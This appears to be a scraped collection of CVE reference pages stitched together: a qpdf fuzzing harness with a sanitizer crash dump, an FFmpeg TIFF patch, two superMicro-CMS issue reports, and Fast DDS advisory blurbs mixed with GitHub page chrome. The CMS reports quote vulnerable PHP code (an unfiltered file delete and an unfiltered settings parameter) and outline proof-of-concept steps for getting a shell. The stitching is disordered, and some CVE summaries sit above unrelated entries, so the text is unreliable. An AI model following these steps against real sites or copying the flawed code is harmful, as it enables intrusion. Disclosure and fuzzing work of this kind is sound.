      0x0c0e7fff8f00: 00 00 00 00 00 00 00 00 01 fa fa fa fa fa fa fa
      0x0c0e7fff8f10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c0e7fff8f20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
    ==28751==ABORTING
    

The test program is a wrapper that I modified based on oss-fuzz wrapper:

// file name is qpdf\_afl\_fuzzer.c
#include <qpdf/QPDF.hh>
#include <qpdf/QPDFWriter.hh>
#include <qpdf/QUtil.hh>
#include <qpdf/BufferInputSource.hh>
#include <qpdf/Buffer.hh>
#include <qpdf/Pl\_Discard.hh>
#include <qpdf/QPDFPageDocumentHelper.hh>
#include <qpdf/QPDFPageObjectHelper.hh>
#include <qpdf/QPDFPageLabelDocumentHelper.hh>
#include <qpdf/QPDFOutlineDocumentHelper.hh>
#include <qpdf/QPDFAcroFormDocumentHelper.hh>
#include <cstdlib>

class DiscardContents: public QPDFObjectHandle::ParserCallbacks
{
  public:
    virtual ~DiscardContents() {}
    virtual void handleObject(QPDFObjectHandle) {}
    virtual void handleEOF() {}
};

class FuzzHelper
{
  public:
    FuzzHelper(char\* data);
    void run();

  private:
    PointerHolder<QPDF\> getQpdf();
    PointerHolder<QPDFWriter\> getWriter(PointerHolder<QPDF\>);
    void doWrite(PointerHolder<QPDFWriter\> w);
    void testWrite();
    void testPages();
    void testOutlines();
    void doChecks();
    char const\* input\_f;
    Pl\_Discard discard;
};

FuzzHelper::FuzzHelper(char\* \_input) :
    // We do not modify data, so it is safe to remove the const for Buffer
    input\_f(\_input)
{
}

PointerHolder<QPDF\>
FuzzHelper::getQpdf()
{
    PointerHolder<QPDF\> qpdf \= new QPDF();
    qpdf\->processFile(input\_f);
    return qpdf;
}

PointerHolder<QPDFWriter\>
FuzzHelper::getWriter(PointerHolder<QPDF\> qpdf)
{
    PointerHolder<QPDFWriter\> w \= new QPDFWriter(\*qpdf);
    w\->setOutputPipeline(&this\->discard);
    w\->setDecodeLevel(qpdf\_dl\_all);
    return w;
}

void
FuzzHelper::doWrite(PointerHolder<QPDFWriter\> w)
{
    try
    {
        w\->write();
    }
    catch (QPDFExc const& e)
    {
        std::cerr << e.what() << std::endl;
    }
    catch (std::runtime\_error const& e)
    {
        std::cerr << e.what() << std::endl;
    }
}

void
FuzzHelper::testWrite()
{
    // Write in various ways to exercise QPDFWriter

    PointerHolder<QPDF\> q;
    PointerHolder<QPDFWriter\> w;

    q \= getQpdf();
    w \= getWriter(q);
    w\->setDeterministicID(true);
    w\->setQDFMode(true);
    doWrite(w);

    q \= getQpdf();
    w \= getWriter(q);
    w\->setStaticID(true);
    w\->setLinearization(true);
    w\->setR6EncryptionParameters(
        "u", "o", true, true, true, true, true, true, qpdf\_r3p\_full, true);
    doWrite(w);

    q \= getQpdf();
    w \= getWriter(q);
    w\->setStaticID(true);
    w\->setObjectStreamMode(qpdf\_o\_disable);
    w\->setR3EncryptionParameters(
	"u", "o", true, true, qpdf\_r3p\_full, qpdf\_r3m\_all);
    doWrite(w);

    q \= getQpdf();
    w \= getWriter(q);
    w\->setDeterministicID(true);
    w\->setObjectStreamMode(qpdf\_o\_generate);
    w\->setLinearization(true);
    doWrite(w);
}

void
FuzzHelper::testPages()
{
    // Parse all content streams, and exercise some helpers that
    // operate on pages.
    PointerHolder<QPDF\> q \= getQpdf();
    QPDFPageDocumentHelper pdh(\*q);
    QPDFPageLabelDocumentHelper pldh(\*q);
    QPDFOutlineDocumentHelper odh(\*q);
    QPDFAcroFormDocumentHelper afdh(\*q);
    afdh.generateAppearancesIfNeeded();
    pdh.flattenAnnotations();
    std::vector<QPDFPageObjectHelper\> pages \= pdh.getAllPages();
    DiscardContents discard\_contents;
    int pageno \= 0;
    for (std::vector<QPDFPageObjectHelper\>::iterator iter \=
             pages.begin();
         iter != pages.end(); ++iter)
    {
        QPDFPageObjectHelper& page(\*iter);
        ++pageno;
        try
        {
            page.coalesceContentStreams();
            page.parsePageContents(&discard\_contents);
            page.getPageImages();
            pldh.getLabelForPage(pageno);
            QPDFObjectHandle page\_obj(page.getObjectHandle());
            page\_obj.getJSON(true).unparse();
            odh.getOutlinesForPage(page\_obj.getObjGen());

            std::vector<QPDFAnnotationObjectHelper\> annotations \=
                afdh.getWidgetAnnotationsForPage(page);
            for (std::vector<QPDFAnnotationObjectHelper\>::iterator annot\_iter \=
                     annotations.begin();
                 annot\_iter != annotations.end(); ++annot\_iter)
            {
                QPDFAnnotationObjectHelper& aoh \= \*annot\_iter;
                afdh.getFieldForAnnotation(aoh);
            }
        }
        catch (QPDFExc& e)
        {
            std::cerr << "page " << pageno << ": "
                      << e.what() << std::endl;
        }
    }
}

void
FuzzHelper::testOutlines()
{
    PointerHolder<QPDF\> q \= getQpdf();
    std::list<std::vector<QPDFOutlineObjectHelper\> \> queue;
    QPDFOutlineDocumentHelper odh(\*q);
    queue.push\_back(odh.getTopLevelOutlines());
    while (! queue.empty())
    {
        std::vector<QPDFOutlineObjectHelper\>& outlines \= \*(queue.begin());
        for (std::vector<QPDFOutlineObjectHelper\>::iterator iter \=
                 outlines.begin();
             iter != outlines.end(); ++iter)
        {
            QPDFOutlineObjectHelper& ol \= \*iter;
            ol.getDestPage();
            queue.push\_back(ol.getKids());
        }
        queue.pop\_front();
    }
}

void
FuzzHelper::doChecks()
{
    // Get as much coverage as possible in parts of the library that
    // might benefit from fuzzing.
    testWrite();
    testPages();
    testOutlines();
}

void
FuzzHelper::run()
{
    // The goal here is that you should be able to throw anything at
    // libqpdf and it will respond without any memory errors and never
    // do anything worse than throwing a QPDFExc or
    // std::runtime\_error. Throwing any other kind of exception,
    // segfaulting, or having a memory error (when built with
    // appropriate sanitizers) will all cause abnormal exit.
    try
    {
        doChecks();
    }
    catch (QPDFExc const& e)
    {
        std::cerr << "QPDFExc: " << e.what() << std::endl;
    }
    catch (std::runtime\_error const& e)
    {
        std::cerr << "runtime\_error: " << e.what() << std::endl;
    }
}

int main(int argc, char\*\* argv){
    if (argc < 2){
	    std::cerr << "Please input the processed file!\\n";
    }
    FuzzHelper f(argv\[1\]);
    f.run();
    return 0;
}

The PoC file is attached:  
poc.zip

CVE-2021-25786: Heap-use-after-free in `Pl_ASCII85Decoder::write` · Issue #492 · qpdf/qpdf

An issue was discovered in decode_frame in libavcodec/tiff.c in FFmpeg version 4.3, allows remote attackers to cause a denial of service (DoS).

**\[FFmpeg-devel\] \[PATCH 7/7\] avcodec/tiff: Disallow striped and tiled tiffs except for DNG****Michael Niedermayer** michael at niedermayer.cc  
_Fri Nov 6 01:11:10 EET 2020_

*   Previous message (by thread): \[FFmpeg-devel\] \[PATCH 6/7\] avcodec/h264idct\_template: Fix integer overflow in ff\_h264\_chroma422\_dc\_dequant\_idct()
*   Next message (by thread): \[FFmpeg-devel\] \[PATCH\] Moves yuv2yuvX\_sse3 to yasm, unrolls main loop and other small optimizations for ~20% speedup.
*   **Messages sorted by:** \[ date \] \[ thread \] \[ subject \] \[ author \]

strips + tiles is not allowed in TIFF
DNG uses a separate codepath

Regression since da5b3d002862d1e105002a6dc1567e6551860896.

Fixes: NULL pointer dereference
Fixes: poc1

Found-by: 1vanChen of NSFOCUS Security Team
Signed-off-by: Michael Niedermayer <michael at niedermayer.cc\>
---
 libavcodec/tiff.c | 7 +++++--
 1 file changed, 5 insertions(+), 2 deletions(-)

diff --git a/libavcodec/tiff.c b/libavcodec/tiff.c
index 2e45464218..00f0c0ccf7 100644
--- a/libavcodec/tiff.c
+++ b/libavcodec/tiff.c
@@ -1923,14 +1923,17 @@ again:
     has\_strip\_bits = s->strippos || s->strips || s->stripoff || s->rps || s->sot || s->sstype || s->stripsize || s->stripsizesoff;
 
     if (has\_tile\_bits && has\_strip\_bits) {
-        av\_log(avctx, AV\_LOG\_WARNING, "Tiled TIFF is not allowed to strip\\n");
+        int tiled\_dng = s->is\_tiled && is\_dng;
+        av\_log(avctx, tiled\_dng ? AV\_LOG\_WARNING : AV\_LOG\_ERROR, "Tiled TIFF is not allowed to strip\\n");
+        if (!tiled\_dng)
+            return AVERROR\_INVALIDDATA;
     }
 
     /\* now we have the data and may start decoding \*/
     if ((ret = init\_image(s, &frame)) < 0)
         return ret;
 
-    if (!s->is\_tiled) {
+    if (!s->is\_tiled || has\_strip\_bits) {
         if (s->strips == 1 && !s->stripsize) {
             av\_log(avctx, AV\_LOG\_WARNING, "Image data size missing\\n");
             s->stripsize = avpkt->size - s->stripoff;
-- 
2.17.1

*   Previous message (by thread): \[FFmpeg-devel\] \[PATCH 6/7\] avcodec/h264idct\_template: Fix integer overflow in ff\_h264\_chroma422\_dc\_dequant\_idct()
*   Next message (by thread): \[FFmpeg-devel\] \[PATCH\] Moves yuv2yuvX\_sse3 to yasm, unrolls main loop and other small optimizations for ~20% speedup.
*   **Messages sorted by:** \[ date \] \[ thread \] \[ subject \] \[ author \]

More information about the ffmpeg-devel mailing list

CVE-2020-36138: Disallow striped and tiled tiffs except for DNG

An issue was discovered in pcmt superMicro-CMS version 3.11, allows attackers to delete files via crafted image file in images.php.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed

gift89a opened this issue

Jan 14, 2021

· 2 comments

Closed

**Arbitrary file deletion vulnerability #1**

gift89a opened this issue

Jan 14, 2021

· 2 comments

**Comments**

**Vulnerability exploitation conditions: Log in to the management background**

Vulnerable code: superMicro-CMS-main/admin/images.php line:151

\` if (array\_key\_exists('submit2', $\_POST)) { // Delete

    	$imagename = trim($_POST['delete']);
    	$delete = '../img/' . $imagename; //**$imagename, User controllable parameters**
    	// $disallowed = array('img-loading.gif', 'nav-icon.jpg');
    
    	if (strlen($imagename) < 1) {
    		$problem = TRUE;
    		$response = '<em>No image filename was entered.</em>';
    	}
    
    	// Admin images moved to admin
    
    	if (($imagename == 'og.jpg') || ($imagename == 'bg_footer.gif') || ($imagename == 'bg_footer_monochrome.gif')) {
    		$problem = TRUE;
    		$response = "<em>The default images can't be deleted. Maybe upload a new one (<b>og.jpg</b> must be 200 pixels square).</em>";
    	}
    
    	if (!$problem) {
    		if (file_exists($delete)) {
    			unlink($delete); //**Unfiltered, can directly all files**
    			$response = '<em>Success. <b>' . $imagename . '</b> was deleted.</em>';
    		} else {
    			$response = '<em>Image <b>' . $imagename . '</b> doesn\'t exist. Try another.</em>';
    		}
    	}
    }`
    

Vulnerability POC：

Thanks for that too. Will do it.

Changes made. Thanks again.

2 participants

CVE-2021-25856: Arbitrary file deletion vulnerability · Issue #1 · pcmt/superMicro-CMS

An issue was discovered in pcmt superMicro-CMS version 3.11, allows authenticated attackers to execute arbitrary code via the font_type parameter to setup.php.

**Vulnerability conditions: log in to the management background**

Vulnerability file：superMicro-CMS-main\\admin\\setup.php

\`  
// Write/overwrite settings file  
$settings = '../inc/settings.php'; //settings file  
$settings\_text = "<?php //settings\_text,Many parameters are user-controllable

if(!defined('ACCESS')) {  
die('Direct access not permitted to settings.php.');  
}

define('LOCATION', '{$site\_location}');  
define('ADMIN', '{$admin}');  
define('APACHE', {$apache});  
define('WINDOWS', {$windows});  
define('OPSYS', '{$opSystem}');  
define('HOME\_LINK', '{$home\_link}');  
define('NAME', '{$name}');  
define('ALPHABETICAL', {$alphabetical});  
define('SHOW\_ERRORS', {$show\_errors});  
define('TRACK\_HITS', {$track\_hits});  
define('PHP\_EXT', {$php\_ext});  
define('EMAIL', '{$email}');  
define('SITE\_NAME', '{$site\_name}');  
define('OWN\_NAME', '{$own\_name}');  
define('CONTACT\_TEXT', '{$contact\_text}');  
define('CONTACT\_MENU', '{$contact\_menu}');  
define('FONT\_TYPE', '{$font\_type}'); // This parameter is not filtered, I just start from here  
define('LANG\_ATTR', '{$lang\_attr}'); // This parameter also not filtered  
define('VERSION', '{$version}');

?>";  
$fp2 = @fopen($settings, 'w+'); //open settings.php  
fwrite($fp2, $settings\_text); // save content to settings.php\`

$font_type = $_POST['font_type']; // This value is not visible on the page and can be submitted with burpsuite

Vulnerability POC：

1.  log in to the management background
2.  Click setup-->Submit setup

3\. BurpSuite modify “font\_type” value

4\. Access this shell

CVE-2021-25857: Admin setup option getshell · Issue #2 · pcmt/superMicro-CMS

eprosima Fast DDS is a C++ implementation of the Data Distribution Service standard of the Object Management Group. Prior to versions 2.11.0, 2.10.2, 2.9.2, and 2.6.5, a data submessage sent to PDP port raises unhandled `BadParamException` in fastcdr, which in turn crashes fastdds. Versions 2.11.0, 2.10.2, 2.9.2, and 2.6.5 contain a patch for this issue.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

CVE-2023-39945: Fast-CDR/src/cpp/Cdr.cpp at v1.0.26 · eProsima/Fast-CDR

eprosima Fast DDS is a C++ implementation of the Data Distribution Service standard of the Object Management Group. Prior to versions 2.10.0, 2.9.2, and 2.6.5, a malformed GAP submessage can trigger assertion failure, crashing FastDDS. Version 2.10.0, 2.9.2, and 2.6.5 contain a patch for this issue.